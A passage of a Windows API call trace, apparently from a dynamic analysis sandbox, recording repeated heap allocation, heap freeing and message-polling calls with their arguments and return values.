hHeap=0x660000) returned 1 [0058.126] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257400 [0058.126] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.126] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.126] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257400 | out: hHeap=0x660000) returned 1 [0058.126] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257400 [0058.126] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0058.126] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.126] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257400 | out: hHeap=0x660000) returned 1 [0058.126] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257400 [0058.126] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.126] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc2e) returned 0x9c778e8 [0058.126] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.126] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0058.126] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257400 | out: hHeap=0x660000) returned 1 [0058.127] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257400 [0058.127] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.127] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.127] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257400 | out: hHeap=0x660000) returned 1 [0058.127] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257400 [0058.127] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0058.127] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.127] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257400 | out: hHeap=0x660000) returned 1 [0058.127] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257400 [0058.127] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0058.127] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0058.127] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257400 | out: hHeap=0x660000) returned 1 [0058.127] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257400 [0058.127] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0058.127] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0058.127] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257400 | out: hHeap=0x660000) returned 1 [0058.127] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257400 [0058.127] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.127] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.127] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257400 | out: hHeap=0x660000) returned 1 [0058.127] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257400 [0058.127] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.127] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.127] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257400 | out: hHeap=0x660000) returned 1 [0058.127] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257400 [0058.127] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0058.127] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.127] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257400 | out: hHeap=0x660000) returned 1 [0058.127] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257400 [0058.127] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0058.127] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.127] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257400 | out: hHeap=0x660000) returned 1 [0058.127] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257400 [0058.127] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.128] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.128] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257400 | out: hHeap=0x660000) returned 1 [0058.128] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257400 [0058.128] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.128] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.128] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257400 | out: hHeap=0x660000) returned 1 [0058.128] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257400 [0058.128] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.128] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.128] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257400 | out: hHeap=0x660000) returned 1 [0058.128] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257400 [0058.128] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.128] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.128] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257400 | out: hHeap=0x660000) returned 1 [0058.128] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257400 [0058.128] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.128] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.128] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257400 | out: hHeap=0x660000) returned 1 [0058.128] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257400 [0058.128] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.128] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.128] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257400 | out: hHeap=0x660000) returned 1 [0058.128] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257400 [0058.128] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.128] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.128] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257400 | out: hHeap=0x660000) returned 1 [0058.128] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257048 | out: hHeap=0x660000) returned 1 [0058.128] PeekMessageW (in: lpMsg=0x9f4ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4ff08) returned 0 [0058.128] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257048 [0058.128] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0058.128] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257400 [0058.128] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.128] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.128] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257400 | out: hHeap=0x660000) returned 1 [0058.128] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257400 [0058.129] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.129] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.129] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257400 | out: hHeap=0x660000) returned 1 [0058.129] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257400 [0058.129] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.129] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.130] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257400 | out: hHeap=0x660000) returned 1 [0058.130] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257400 [0058.130] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.130] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.130] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257400 | out: hHeap=0x660000) returned 1 [0058.130] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257400 [0058.130] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.130] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.130] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257400 | out: hHeap=0x660000) returned 1 [0058.130] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257400 [0058.130] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0058.130] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.130] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257400 | out: hHeap=0x660000) returned 1 [0058.131] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257400 [0058.131] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.131] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc2e) returned 0x9c778e8 [0058.131] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.131] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0058.131] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257400 | out: hHeap=0x660000) returned 1 [0058.131] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257400 [0058.131] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.131] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.131] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257400 | out: hHeap=0x660000) returned 1 [0058.131] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257400 [0058.131] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0058.131] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.131] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257400 | out: hHeap=0x660000) returned 1 [0058.131] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257400 [0058.131] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0058.131] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0058.131] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257400 | out: hHeap=0x660000) returned 1 [0058.131] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257400 [0058.131] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0058.131] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0058.131] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257400 | out: hHeap=0x660000) returned 1 [0058.131] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257400 [0058.131] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.131] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.131] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257400 | out: hHeap=0x660000) returned 1 [0058.131] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257400 [0058.131] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.131] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.131] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257400 | out: hHeap=0x660000) returned 1 [0058.131] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257400 [0058.131] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0058.131] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.132] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257400 | out: hHeap=0x660000) returned 1 [0058.132] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257400 [0058.132] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0058.132] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.132] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257400 | out: hHeap=0x660000) returned 1 [0058.132] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257400 [0058.132] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.132] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.132] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257400 | out: hHeap=0x660000) returned 1 [0058.132] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257400 [0058.132] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.132] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.132] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257400 | out: hHeap=0x660000) returned 1 [0058.132] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257400 [0058.132] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.132] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.132] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257400 | out: hHeap=0x660000) returned 1 [0058.132] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257400 [0058.133] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.133] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.133] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257400 | out: hHeap=0x660000) returned 1 [0058.133] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257400 [0058.133] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.133] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.133] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257400 | out: hHeap=0x660000) returned 1 [0058.133] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257400 [0058.134] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.134] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.134] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257400 | out: hHeap=0x660000) returned 1 [0058.134] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257400 [0058.134] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.134] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.134] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257400 | out: hHeap=0x660000) returned 1 [0058.134] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257400 [0058.134] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.134] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x9c778e8 [0058.134] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.134] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0058.134] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257400 | out: hHeap=0x660000) returned 1 [0058.134] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257048 | out: hHeap=0x660000) returned 1 [0058.134] PeekMessageW (in: lpMsg=0x9f4ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4ff08) returned 0 [0058.134] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e9c8 [0058.134] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0058.134] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec48 [0058.134] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.134] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.134] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec48 | out: hHeap=0x660000) returned 1 [0058.134] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec48 [0058.134] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.134] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.134] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec48 | out: hHeap=0x660000) returned 1 [0058.134] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec48 [0058.134] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.134] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.134] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec48 | out: hHeap=0x660000) returned 1 [0058.134] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec48 [0058.134] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.134] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.134] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec48 | out: hHeap=0x660000) returned 1 [0058.134] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec48 [0058.135] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.135] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.135] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec48 | out: hHeap=0x660000) returned 1 [0058.135] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec48 [0058.135] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0058.135] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.135] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec48 | out: hHeap=0x660000) returned 1 [0058.135] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec48 [0058.135] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.135] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc2e) returned 0x9c778e8 [0058.135] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.135] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0058.135] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec48 | out: hHeap=0x660000) returned 1 [0058.135] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e9c8 | out: hHeap=0x660000) returned 1 [0058.135] PeekMessageW (in: lpMsg=0x9f4ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4ff08) returned 0 [0058.135] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e9c8 [0058.135] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0058.135] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec48 [0058.135] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.135] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.135] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec48 | out: hHeap=0x660000) returned 1 [0058.135] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec48 [0058.135] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.135] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.135] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec48 | out: hHeap=0x660000) returned 1 [0058.135] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec48 [0058.135] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.135] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.135] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec48 | out: hHeap=0x660000) returned 1 [0058.135] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec48 [0058.135] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.135] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.135] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec48 | out: hHeap=0x660000) returned 1 [0058.135] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec48 [0058.135] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.136] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.136] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec48 | out: hHeap=0x660000) returned 1 [0058.136] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec48 [0058.136] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0058.136] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.136] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec48 | out: hHeap=0x660000) returned 1 [0058.136] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec48 [0058.136] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.136] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc2e) returned 0x9c778e8 [0058.136] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.136] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0058.136] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec48 | out: hHeap=0x660000) returned 1 [0058.136] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec48 [0058.136] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.136] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.136] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec48 | out: hHeap=0x660000) returned 1 [0058.136] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e9c8 | out: hHeap=0x660000) returned 1 [0058.136] PeekMessageW (in: lpMsg=0x9f4ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4ff08) returned 